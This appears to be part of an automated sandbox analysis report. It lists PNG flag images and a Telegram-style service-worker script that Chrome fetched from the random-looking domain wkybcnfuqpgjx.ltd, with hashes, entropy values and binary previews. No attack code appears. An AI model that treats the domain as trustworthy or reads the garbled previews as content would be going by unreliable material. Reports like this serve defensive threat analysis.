                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4705
                                  Entropy (8bit):7.932152300086477
                                  Encrypted:false
                                  SSDEEP:96:CDPFsTFrTg/H7SkuXyRofv7mjZbRLzWW+lRMCY/MwFbci6WcQ7:Q9UJYonK9blzWW+r2xAC
                                  MD5:F44926EE73B2301E2817848675A8C60E
                                  SHA1:02C17511B14E855A27F86868FA5CBE29C48C299E
                                  SHA-256:E812F13A179656F2ECF05CA4F0C4BB33569B0197211535AD10B9FC4CA0F0B1A1
                                  SHA-512:BDBF897FCF6038ECEF01EB43CDA79AD17935897EB09702D0BEBF630BB5A86E698EF26596B5CCC880ED4E0F2479A83E5D5F932B65A6A743E87DAFDB8500D24FF5
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.}.x.{..p.}.s.v.|.q.v.~.{.M..t..........sA.k9.xE..R..`.V..o4.......a..L..A...q.N..I..G..H..F..H..G..G..G..F..A..`.O.D.<.9.3.1.1...z9..X.F.7.4.-..+.}*.o4..N..L..J..H.=.:..O.C.@.l2.`*.X..e!.o%.v(..O..P..P....).$.|...:..5.u...B..q.................................................d.........................................................................................................................................XX......u..{......++.......::....GG.nn........cc.ww.................t.n^.WF.>3.*/.'"........+.#w.s...L.D5.,*.!%...y..{..v..t..q..n..i..b...4.+,.#...(...|..r.#}.5.,1.(2.)/.&6.-/|(s.pC.:$x..[.#m. c..D..N.4.+.q.&s..g..[..V..T..O..J..?..V.|.G..l.`..c.S..T.Q.I.=.:.q.w.Y.\.d.=.s.@.j.h.a.nD`WJ...+tRNS...5Vev.>%.......c.....~c~~b}.....dE/....T..Z....IDATx^..Io.@...6.$@E.8....g.f...d.\z.......[.........p_....Z.D+)+.*n%.\o.&2f>;l....Y.J=R..Z.mKX\&.9SW...m.l2-......,...m).
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5367
                                  Entropy (8bit):7.934455634096835
                                  Encrypted:false
                                  SSDEEP:96:c2l14gxkz+fnygv5lHnlFNSx9Y3MgprSOB/RL5dxnl8aPRW1RncsL/v3E8qf4jWQ:iTQxTlFoY3/5xRLXxnpW1Rce/v5qfAWQ
                                  MD5:28F78D2400571353EF31A8F97ABDE300
                                  SHA1:6B19B041E6BAB90B4FFA410BF8EF0249DBDA437A
                                  SHA-256:602C1048A0F7AD18B5016D4FD9E40F9A5C19D3AA52286BF193CE4859A9E48AA4
                                  SHA-512:48668A02B8681A99E756FBE0F93A04A167D1D214298014496C5EDE1C5CCB48C7E1576A59D44D758B54FC7EA2FF3F7063AC78AF81282F76388FED46A43AC2D9F9
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ee-1f1f1.png
                                  Preview:.PNG........IHDR.....................PLTEGpL......zzz...{{{.....yyy...~~~.....rtx.5v........Q_.sss............!`..[..Zqtx......qqq...xxx......vvv...www..........www.................uuu..............................................................................................................................................................................................................................................................................................................................z.......w..o..v.....j....x..i.....a..|||X|.www\x.cu.sssMs.Ho.Pn.Bj.Fe.9e.?c.Sa.2^.6Z.*X.2T.&U.%U.%T.$S.*R."R.!P..P. O..M.&L..M..K..J./G|.I..H..H..G..E..E..E..D..B..B..@..@..?..>..?..=..=..<..;..:..9..9..9..7..6u.6..5..5..4..3..2..2../..0../../..,..-..+..(..)y.%.."..%o....... `..x..^O..!...5tRNS....#)89EPRXcccgffprz..~~~~..........................Z......qIDATx..i.dWu.....^...g...3xa..... a).M .......!.!.(..HQ>!G.JD.....l.!@..I.V..8.........]]]...s..^U..LU.t.n{>.Oo
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4012
                                  Entropy (8bit):7.8543870208232
                                  Encrypted:false
                                  SSDEEP:96:3rY04IrsJGgXZkuvrW1OD+Gk5R8DVWdSbnPH:3E04Css6PzW1wYbaV9nPH
                                  MD5:9C723719A3623569764A0757926B0CFD
                                  SHA1:004FE2C611471C5BCD487352C6596147F108DEA3
                                  SHA-256:92B3D3A5FBB2DE40729522E159929AB03CE6BB414D38AFE65B363340C9DB097E
                                  SHA-512:58D118C5DEC4827F70280170ED1B92FA7397471F4CE3F5C189C2EC9694A2F7AEAFE48701DBCDE7924142739C0A6944600CE62E86169088805918E12540B0BDFD
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.fc.F).lp.J*.tx.J+.LP.tw....+0.J*.e?.vy._c.N(....#)x...nq.39.I*.y}.pt.JN.K+.mq.H).x|.mq.B#.N/.qu.K,.x|.P1.O/.C#.P1.im.@E........................................................................................................................................................................................s....}...........ty...]...y|.txQ.{.pt.ah.mq.im.fj.lp.af:.p.\a.af.V]E.oh.u.dh.[a.PW.`d.TZ.W\.\`.JQ&.b&.a%.`$._.CK4.b$._.KR.EM.BJ.UZ.BJ#.^.NT".].AI.?H#.\..[.?G..Y.=E.AI!.Y..X.<D.HO.MR..V".X.9B..U.@G.8A..S..T.6?.7?..P..Q.@F.09.8@.4<..M..Q#.R..N.:B.2:.19..K./8..J..6.}M.7>..J.3:.&/..H.-5./6.+3.|H..E.*2.(1..D..5.vF.'/.}A.'...(.(0.{@.!*.rD.$-.y>.,3."+.17.#+.x=.mB.w<. (.u:.r9..&.i=..$.e=..%.m7.(.....n+.`:..#.f4.Z6.. ._1....U3.[..Q1....T*.O).K)y...F$.A!?.p.....tRNS...",9EU[ccbdhn}~~~........................................................................................................................j.....IDATx....n$.}...\..l.f.C..X1.@..A
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3847
                                  Entropy (8bit):7.93118306808118
                                  Encrypted:false
                                  SSDEEP:96:3ns9d9G/RAzR/430IFqxmdTvYCS96SCLCpeR8:3nswpO/43bYCS9CL2eR8
                                  MD5:BA7C2DF18AB49C05647205B4B19F75D8
                                  SHA1:49F93D2C69DED7D214F546F2F521DFDF83F9319E
                                  SHA-256:1F5615547C2E2D81F51F917194B0D7D2A7916691E1A1BDEBEA8FE71A82DB2B7C
                                  SHA-512:4BAB07FF6AF66727F3F3324A1C258B56A32FC7912E3FC25A4BAF1B55047FD9242641960C753A1B13A3D952E5E2F06441DD8F5DFA265284105F9C246AF6DC244E
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1f5.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..K..I;Mu."L.... K.&O!*S.#S..> -Y.%W]r...D.!K\q.ew../e.+[cw..7w.,W&%K..>.%S.>{Zo.=T.."O`|.$&K]q.Zp.J_.I].>R.?T...A.,^`u...Af}.Oj.FZ...D.1f #I.%Z`t.k..$7ho..hz."/ZSi.Pe.9O~.!Qs..g{.l~.Rg._r...W";o'?pGa.0J~@Z.36abu.6<fK`..2B.3C....1Az.+.2C.+;.0?....$.....?....&6.'7.!1.0A.6F.'4./>..*.4C.....U.+=....&.>M..K.GQ....)..c.*9.#3..,....'7..,..B. 1.:H.:I.......$YTx.....BN..(.7F..... ..!.............1i.DK.@K....)`..H....KU..........!2..#.KW......_)G,.D.hs...Xn....q{...v."........./a.%Q.Ub........!+A'K.B..cml$<.PYR"@.......Vc.........oh.L./.Yd.z..d..DO`..."+.K.......^x.!-....`l<W......}......|].4.;.-Ci9h......:c..*7...1\...#?Ep.",.2<.5B.!,..*..S..'.6C.FSB<p..$Fh.7I|Qq..%0..%60[kPs.BU.7K...&S..&1y.1.-;?j..;F..$.Rl^f.w.*.&8.<HDn.#.Qu\..)U.%2.Ob0)Rw3N>-T^^..HK....JtRNS....e..3....I.*.........!.O.x..`$...3......<.....2qY.E.?....se......&NX....lIDATx....[SW....0 B.l*..h...*.......M..I ...!.$4..@.([..d...V....V.6.......@c...|..h;.oI.3.}
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4987
                                  Entropy (8bit):7.913761415595662
                                  Encrypted:false
                                  SSDEEP:96:zNfOoHiZRT62IybenzDHS89MgSX3zdWpLFPIpxtjRaA6R8CFLPPrJv0xC:hmLZXI9zzSq4zuLFgpTlaAS116C
                                  MD5:E7B5E273400011D6B0292A32B0338A2E
                                  SHA1:60408CCA85DF85252B7D206AE08D10B324ABF1BB
                                  SHA-256:88146190D2B5D44E4BCD152368B17C82E36F07274C761C8CEC16F442524E4649
                                  SHA-512:470C64AEA45A85196B4B0B42A1C73B9EA84ED7597B3FE04AAD6EDF9C9765E7DDF6928E234807BCE8944F8BA5A31FBEEF8130F1E68C3ADE00C5C5B31722BD92C5
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLd.t.?..A!g.w.=..B"a.q....s{..3.V/.<.g.w.>.c.rSt^.........y...A.e.u.<.<oMi.x.?._.o.?..6.j.z.<.b.r.?..@ /eBk.{[.j.8..............................................................................................................................!.....#..&...........%.......)..........-........0........4................:......{..z>n...n.v......jB.dzc.xi.y.m{e.u.Xo.YG._q_.p^.nJ.eU.j.LfY.j.JK.QfJ.bS.dI.`.@U>.Z.9OC.Z.:VG~[.BY.4R4.R.3R.1Q.1O.N[BzV5.P./O./N8}Q.+T+.K.-L.,K%.G.*I%.F7vN.$U+|H.2K.(G".D"~D..W.&E."C.;L.#D.%D.|A)vE.$C..X.z?."A..>,oD.!?.v=..>.x9.r=.!>..<..<.u7.!=..8..:,e@..9.m9.!:..8.p5..6..6.r...4.m1.h4..3..1. 7..1..2.j-.a4..0..0.g,.....-.a..\0.d*..3..+..-..+.c&..'..'.a$.W,..(.^#.Q*.[ ..%.W"....L'.W..Q...".F%.P..J.|...C.x...?..@.x...:..6..3.&.K....'tRNS...*5>PRcccccdmxy~~~~~...................F.....IDATx.....W^..o.S.n}....vp@..x...*@....H.>....xD.....".<..>q..*..v..,.&K6.$.Nl..K_.~.E.9US........U.......w....-..X8.Y....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4993
                                  Entropy (8bit):7.939834658143953
                                  Encrypted:false
                                  SSDEEP:96:hKPZW6APESXFX20zW4DJwPjKJK6LMza+TdOtqCgZws6wnM2BTPY/E0v5A6mpCq:hyaEmpm7qFp+TNw32ZIKT
                                  MD5:EEA4DA57C82367C2AB37FFA67EF74B17
                                  SHA1:AD1B3AA461E80E09094EC6DC15FD5DDD7FF3F9BE
                                  SHA-256:A1448EBA3763BB4C28BA7AE8AA0D84058525607C6FCA7F108CEB25051C091FD9
                                  SHA-512:4F5A497E16EB7C6826807C74D61484A069B800D587C19DBAEF7CD95D87A0EAEBD0A2E4C987E0AB7B8B36ACCDB3EDED238D82C362A94982562F91A89961FBBA43
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ed-1f1f0.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.>Ff...iqk...iqg..f...jr.owf..g...iq.CNw.$. ,.px..:g..`...goj..u...&2g...ho.s{g...CL.nv.dlg...pyd...hpg...nvh...rz.S[l.!.dl`..m.".<F.................................................................{..t..ly.gt.rz.bp.ow.^l.lu.ir.eo.Ue.fn._j.aj.Ye.ck.[f.M].S_.^g.[d.T`.MZ.FV.V_.Xa.EU.OZ.KX.@P.ET.>N.KV.;L.NX.BP.5G.=K.4F.6H.4E.7H.AN.3E.3E.2D.3D.3D.1C.DO./B.1C./A.>J./A.5D.,>.0B..?.->.,>.6D.-?.,>./@.*<.*<.':.*<.+<.7C.,=.(:.(:.'9.,<."6.'9.1?.&8.'8.%7.,<.%7.$5.$6.#5.#4.(7..0."4."3.$4. 3.!3.)8.....1.2=..,..1.!1..0."2..0../.'6../.!1.....(...."2..,."1..+..-..+.%3..*..*..*..#..(..(."/..+..(..'..+..&..-.#0..&..&..%..%..$..$..$..#.."."-..$..!.."..+..!..+..!.. ..!..$..'........ .. .....).."..&......|.&........!u.%p.#......y..m..z..i..u..q..e..j..b..c..^...e;....-tRNS......"12<CSUUacegfpwz~......................|.4i....IDATx..{.\.Y...v.\vf..k....:..!.iKC]......M+.TU..............-M.E...Q..Um%..6)4ML.L.6.v.o...mvf..].........?..=....9..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Unicode text, UTF-8 text, with very long lines (10089)
                                  Category:downloaded
                                  Size (bytes):10146
                                  Entropy (8bit):5.319126771089841
                                  Encrypted:false
                                  SSDEEP:192:Iy+4oSURBKsktdBzlvv60gRAKtAU3o8qVx1H6fuZtsZkCryaTxQGw9p96FJ8g+:IbS0XkfBZ2CKto8qVy2vsZbry+anQ4d
                                  MD5:1B4E34869BC5B5A0F1317B28F38A5AA1
                                  SHA1:11547F5A4895422EBC20B99E3AAEC5ED861033C4
                                  SHA-256:7A215798ECD2E7FBCEDDC9580F1059EC38E7B8873954F9E74816E668AC3A3C6A
                                  SHA-512:C7D65541B5C1DF79DF78C75BF3C69CF9AE956D6106C5FC1E4F9D4491DF9EF7E5830DCC8F06C34D6345D789B69B57D26A24087B290ECFEC72ABE3A5BC22873E5F
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/5284.41380bbee618193f889a.js
                                  Preview:(()=>{"use strict";const e=!1,t="tt-media-progressive",n="tt-assets",s=("undefined"!=typeof window&&window.innerHeight,Math.round(450),new Set(["newMessage","newScheduledMessage","deleteMessages","deleteScheduledMessages","deleteHistory"]),new Set(["image/png","image/jpeg","image/gif"])),a=new Set(["video/mp4","video/quicktime"]);new Set(["audio/mp3","audio/ogg","audio/wav","audio/mpeg","audio/flac","audio/aac","audio/m4a","audio/mp4","audio/x-m4a"]),new Set([...s,...a]),new Set(["USERNAME_PURCHASE_AVAILABLE","USERNAME_INVALID"]),new Set(["t.me","web.t.me","a.t.me","k.t.me","z.t.me"]),new Set(["AU","BD","CA","CO","EG","HN","IE","IN","JO","MX","MY","NI","NZ","PH","PK","SA","SV","US"]),new Set(["USER_CANCELED"]);const i=e=>new Promise((t=>{setTimeout((()=>t()),e)}));async function o(e){const t=await r((async()=>{const t=await self.caches.open(n),s=await t.match(e.request);return{cache:t,cached:s}}),3e3),{cache:s,cached:a}=t||{};if(s&&a){if(a.ok)return a;await s.delete(e.request)}const i=
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5207
                                  Entropy (8bit):7.939941205004514
                                  Encrypted:false
                                  SSDEEP:96:N1a9UGlU6fBcIbeKNPfk0JCcuaQRpG6B7Q4l6bOS1Ee9:N1a9Uy3CEJC3pnB7/2LD
                                  MD5:65307CEE2FF4BD4DAFBC713536D6AC31
                                  SHA1:FAA0698B4197DA89D2EDB0AF62362F70294C68DD
                                  SHA-256:EF5E65E6C2360CADB59CD89120AD3034E19B77D70DBB8855F7EFFB7C8C8952E4
                                  SHA-512:9A14E0FFABE95B5F285892D2A81B87E91DB999C38E8F972BDD8F8DB2FD11DCD26866D41091A241083E6AB5ECB0A4DFFD623334EB651E939ABD9F3C17B66214C4
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ea-1f1f8.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.^`W.....V.....W....V...M?......n."..._...{..n..m.|B....W...{|...X........V..X........T...oqV...tw.RR....."........... .....&..&..%.....%..$..#....."..!..... ........................&.......'.........+..............$...............)..D..........................*.........(............+......m.........v0.....i.../V.S.m1.y.....~..r..{.....a2..%.m..`d.Z^.a..z.qry.o..V0.TY.p..MQ.Yo.NQ.m..X..H6.PSjkL.FK.\....O.uj..@E.EI.;?.A#.R..7<c[Y.7<.BE.6;.5;.59.DH.I..9=.38l[..@..;>.48.16./5./4.)>.-2.04.49.+1.*/.0.BWM.+0XT..).."=.Y..,0.',..)pC..%+k<A.5..,/.#(.%).%*.!&{2'..4.%'..$. %.',.."..!JD..#%..#.. *@v5CE........+c0....y"&.. ...s"$...}..........$r. ...|..i. ...a. p..?0.z.....]..o..d..b..X..R..M..%......VY.ad.]_.Z\.in.eh.LO~f.]...#tRNS.... &4:K\_ccv}~~~.................b.Ub....IDATx....n........77.%.^.v[...}..E.....<B.].)......dY/......b..NE ....V,Y.)..s)5%:"H.T.'....9....s.M.6m.i.M.6m.i.M.....fQ.. ..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4810
                                  Entropy (8bit):7.8936223085104595
                                  Encrypted:false
                                  SSDEEP:96:SAXQuM6O/Mw9U4T6EJic1uKm7+D5FOC3SHPPADVP9Auok1:SAXG1/Mb4TT/1NnovYd9Au71
                                  MD5:0B9F5AC1DA62944E66D41A28AF430594
                                  SHA1:5CF75D8F81C6CF947F64720510CB26500DB9B055
                                  SHA-256:31D1C6376B2C146BD0894C757ECBA0B3EB43B996028A9B3BB269F2D170DD82C5
                                  SHA-512:BF0FB5D180879233E95B9586DDF23EA44C433B7B63631B1C911CE039B0DD2039E41597FB1AECC97B298D5D5A3326121E07FEC48DBA3597ADF610B76EEB508439
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e9-1f1ff.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.......F$l.x...QjZu.{.G%s.~...k...F#}|}...f.|...gtm.E"......W.m....O".J vvv...e.{.E!hslg.}......G%b.x...i...D!qqq......c.y.G$...i.~...uuu.......@.Y.n...5uP...............................................................................................................................................................................................................................xx...{...jj.....q...h.~.]]...a.x...].tU.q.NNI.j{{{O.kV.m=.cttt.>>A.bM.f2.[..[%.V2.Y..V$.U%.T%.S;.Z..W#.R".Q.//B.N+.R .NYtH#.O..Quf>..M._<..N.T8..L..O..K..K.&&..J.&&..I.9,.A/ff<..H.$$.J2..'..I.."..G."".. ..F..I.!!..E.$!..D.....C... }G..B.....C...|Q,..=..@..@..?.....>..;. ...=....~=.y?.};.qA.|:.{9.z8.y8....w6.o9.v5.t4.s3.r2....q0.p1.e6.n/.k/.i,.f-.Z0.a*.P,.U).Y&.M).J%.O!.K .D..?...?:....tRNS.......',56<AHS`ccbdlm~~~.........................................................................................................................j.jy....IDATx...1n$E......j...W.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5306
                                  Entropy (8bit):7.918471599808583
                                  Encrypted:false
                                  SSDEEP:96:xVYO0gY/IVFBrkSZ5cOCp/4M1dMw/v7IzxikkBOeN9NVuKpxA:xVYNAeSZ5cZp/4MQwcwBIck
                                  MD5:18CEC585FBA8C7158A6F9241F77EC265
                                  SHA1:55A4E7D5F197701873E180285BF1BAD2BF717FD6
                                  SHA-256:0519D4AA64F7819AF1FD17974C4C175EDC5CB616C5F8728503A5FF666E63507C
                                  SHA-512:00A08E05F22CE311D606F6DDD70245077FB34CF7C3E7AD20AFCE311AAD806073724A9C2FB426331C6BE059AFA65286FD7B0E3A15E48A97D1AE8697705F7FB18E
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL......tu...}su...{{h...8V}}}...{.4........-.S....j..wxx.........{{.Bp............sss.|....D-C......suv.xwa...........y e........uuu......?Lx.............................................................................................................................................................................................................................................p....r.......T.....tuh..W.....qw.hh.`^...^..B..M..}}}.GC.KK.TX.HH.B9F...LOxxx.Ue.EF/...A=.i..\ukq..BC1...9/sss.ABPx..a.%...??.??......$...716~.._..>>"......;;!...FQ.51.89 ~....Mo.....}..,$*w..44.67.22.z..x.xSvdZ..y..}."r..u..//.u..(#.s..56.w.~Kk.<K.,,.!..*+I\..p..s..))1b..m..h..15. ..&&^Mv.@[.m..i..$%.5C.h...0.e.._..b.."!.a..a.]A`.^.._..V..Y..((.Y.....Q..P.x%).J~....Bo.9d.}\.....tRNS....#"779<MT^ccccgfm.~~...................................................................................................................=.(0....IDATx....d.].......tM...$...e6
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3420
                                  Entropy (8bit):7.833810317779315
                                  Encrypted:false
                                  SSDEEP:48:hXo2LOEVcOVY8w4QdZEncuqV7z89ZiI8ryWNEVAxwrbjRJzKtZN+kQgYRi:B1LQOVFBQscNVHOQPryWNZeTznbRi
                                  MD5:0B2A5EFAF504CF6E78D52B06EE89CF4C
                                  SHA1:E6D47A053570D96772122EC266046F29C1C9A00D
                                  SHA-256:87967ADED7E16EE2D2D9CA19DEB77BE25B15BBC7F1F9A60EF2FC1B02ED3F1574
                                  SHA-512:44D02A9EACBEE7EF7459A82E6F1C6FF4C055EB901417C2F671FC129ADFC4E033145163E2FC62390594246D2448306C30B055FD700E4E760F2CFA16D6C4EA5FA2
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1eb-1f1f7.png
                                  Preview:.PNG........IHDR.....................PLTEGpL...^!'...Il...}i&)...y#..*N.{x...v..u#..,O.~{}...xt...NHTv..93.3.....*N...x"..xt~...+N.1_.yua........*Nu .<b..|ye...rnRt......e...-P....{f..o....._...,P.+&.xu...x#.b........,O...so.+&..u .5^................................................................................................................................{.uo....jc.{v.ha....uq.mh.so.e_....^W.lg....RIe...e`.OG.[U.SL.NEy|~._Z.KC.LC]...I@.XR.RK.D;.I@.KC.F=.B9.D;.LDSy..C;.B9.PI.C;.C;.@7.C<.>6.?7Ot..@8.=4.=5@u..;3.A;.<4Dr..91.@9.:2.<4.80.7.0r..6.El..7/.F@.5,.<5.5,9m.0o..4+.4+.3*.2*.<6.4,.2*.1)-h..1).71.3,/c..82&e..72.-%.b..a..`../)._..2-.^..\..]..]..\..[..X..Z.(T}.Y..Y..(".X...).W..X..V..T..V..U..T..S..R..*%.Q..M..O..#..N..M..L.|$ .K..J..Fu.I..H..E..Czt...C..B}.=j.>x.7e.8l.4Z.3a.0T.0].,R.(L&5......tRNS.......%126:=ILN[_a`bccddgltuv~..................................................................................................................................................Y.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5009
                                  Entropy (8bit):7.903469186964166
                                  Encrypted:false
                                  SSDEEP:96:gmF7lxf1RPDLQG5UMdj43g9JMfjHjZ4GDTv3XwCpJ7kjYSnVCq:gmhfDPDMGekj43LrH9j3jAjYyb
                                  MD5:E62DA259FEE4692134D912120660CF61
                                  SHA1:CA272ED326AC511C71BD0B0A13059BB86ACADE1F
                                  SHA-256:E5B2732D038893D388C8449B2EAEBBEB93F4718BE1371A8BAA7394BBEDAE5519
                                  SHA-512:20C35747AF1C4D851B4EB6E0C2EE8A7447DACC128FCB2D4C251B9AAAFBECA05BDAABEFB5B67907E78C2C8DD115F0CD6A7378E4B49527A5CDA78D772F2CECBBF3
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1f4.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.PO.omq...gcp}.o...wtm..nz..liu.........40..).-P.xuu...OLz#.......mx...>.ro...z#..zwW...lh.....ix.w .|{{...wWVg...wtw..|$ x!..D?.zwo...rq.,Q.'M.......................................................................................................................................}.............oj....}z.xu.sp{...`Y.nk.kg.gc.pm...._Z.b^.li.YSt...SM.ea.ZU.KD.d`i~..NG.KD.JC.JC.QK.IB.IB.IB.ZV.G@.G@.F?.F?.D>.PK.F@.D=.YU.A:.C<at..@9.<5.HB.NJ.B<.=6.<5.:3.?9.2+Vl..D?.LH.71.]\^gz.<6.70.4-.+$.3,.0).4..2+Ke..5/.0*.0*Kb..94.50..'.-&.A=..'.4..,%.'..+$..(C]..*#.*$.(!.)".2,.)".40.' .%..&..*$.$.<W..%..$........$../*.)$..)7Q|....!.....#.0N..+'. .4Kp.$.....(%&H....$F|.'#...~%!!Cz(Ai....@w.......=tz...;q....9ot...7m.3hn...3p.1[.0f..j.,b.*h.(_.$Z. A. ].!V..T..?..O..G..4b.D.....tRNS....%&-7DFTU^`ccbffjx~~...........................................................................................................................J.T....IDATx..[.$.Y...V...l...k
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5475
                                  Entropy (8bit):7.936372844862504
                                  Encrypted:false
                                  SSDEEP:96:mW385UxLhO0KyIsYB2A8YImHMA4PP/EwO3P68QcRXSGRJu4+l5UBXdYiEFa:P3829fKyIsYB2A8UHMAMPc5h1gvrUNxF
                                  MD5:FE77334AF3271214DD172A8C787070AA
                                  SHA1:38A25F727E5EC802675221C667E9C9848B690372
                                  SHA-256:6648C71232F9969A969A238F15BF4EBBE22A9A46ED33C61122DD9079469E85F0
                                  SHA-512:11A91E572CB1F3DEB550B46C9E48064A12230AA8A91405F4DF36D18AEA7BA7FE1266C8B1A543E5BB9CC96D2AD756FCAF220E5E8DF8AA6F97DCEDDCBB2F6615AD
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f3-1f1ff.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..=dd...8fe...<lk...:..?ea...7.{...Ojg......7gc.JJs....KJu..r....9...nh...8...l<Q..9dd..{.XX...:...jj...6.gs.....2bb...?..;ll...1^^...?.fo..3.HHt.1...........................................................................}..........sr....wwl...ge....|..[Tt{.tt..OK.E<bj..><be|.1'Z]..0/.44.&..&&....&&."".(,. ..............................................................y...&&}&&|&&{%%{%%z$${.&.##y...""x..u.....t..s..qw....ps..a....x..j..p..X..O..i..Q..I..g..f..B..d..m..b..Q:....?..^..h..D..N..9..[..W.._..W..O..V..T..J..D..>..1..:hg.]].;;vTT...h.XWLL|YY.RR~FH.&&j;;.//_,,q..l..d..`..Z..b)'x..l!!o.oq44}/0.bb.##t..dDDy...jk.>B.........\++|..dNN...d.......cb_^..."...@@...KK66q..n..... w%$w..Y..........57.QP..]..^........X.....`..^.....[.AA..W.4.....4tRNS...."*8;KSTccehkz{.~~~~................................v....IDATx^..gK.Q...d.....&o..VI0,."F?..^..f...v.. I.WY4.8?..x._....a..a..a..a..1...<...B.<.l.y.......)A... ...I....'&..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4636
                                  Entropy (8bit):7.914394536131557
                                  Encrypted:false
                                  SSDEEP:96:8laXKYDxamRDIGfGDBNl6+SlbTNlclCfswlNs8JjbWoDL:8shDHqRWgpcjbWov
                                  MD5:011B044D1FC504973A154508D7134408
                                  SHA1:2297C0CF7F7C917EC5FFE6FC43EF1443B31B2CEB
                                  SHA-256:4F285B0CA9AA0455C56573B87FFE46230275BD8404C7638DECA3AE9B1ED7F4FB
                                  SHA-512:F979CF17BAB2E3FC88B448310E3FC5427F3705ABCD9CAA7E48D35D3FADE5C0917B8B0FA6C69FEDAEC606CCBDA6BFADB3442054C40298538C70B263193B9BED1D
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL*;\k{..)Leu..$Hfw...@hx.."Feu..&J..Ak|.Y^e.)O..7.1_..@br..$G..;.t.QRK.-R..Fiy.. Dhx...B.!Daq...Bl|.L_.dt.."Eaq...Bl|.;Osl|.dt..!DQc..%H..;j{..............................R..R..S..U.....S..K..Q..I..P..I..Z.F....@.B.;.\.:....C.6.`.8.0.D.2./..\.<.....j.5.....[..2..l|....5s....M..rf}.j{..xIfw.rwu.t"bs.Xr.]p.\n.^m.Vl.tjIXj.Oh.Tf.\djNd.Id.Na.E`.[^WH^.?\.GZ{OZeAZ.@W.9W.@St;S.3S.NQN5R..P.AOa1O.5N{+M.)M.)M.)L.(L.(L.(K.(K.'K.'K.5Jm/J|(J.&J.%I.%I."I.(H.$H.#G.%F."F..F.!E.%D~ D.)Cs!C..C. B..B.!A|.A..A..@.,?_.@.!?w.?..>..>..>..<t.=~.<..<z.<..;~.:m.:|.9|.8t.8x.8{.7v.7y.7..6g.6o.6y.5v.5x.3f.4u.4w.3_.3h.3r.3u.2}.2u.0^.1s.1t.1n.0q./s./r./p..Z..h..z..r..o.-p.-n.+T.,l.,n.+a.+t.+l.*l.)M.*k.*l.)j.'V.(i.'r.'i.&L.'e.&[.&c.&h.%f.$m.$`."H.![. l. M..S..C..J..G..?..;A......mtRNS......))48GFS[aabbfmpu~~~~......................................................................................Y...^IDATx...1..D....W5......M@..F..).B..s. NC..$.s..,.....vU..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4161
                                  Entropy (8bit):7.892029639587117
                                  Encrypted:false
                                  SSDEEP:96:YEnFZEA3YDK3Dsr/ogimdqvpK/gIG90uqkkCMZyVVR:YEFaQs8g6vpuMikFXF
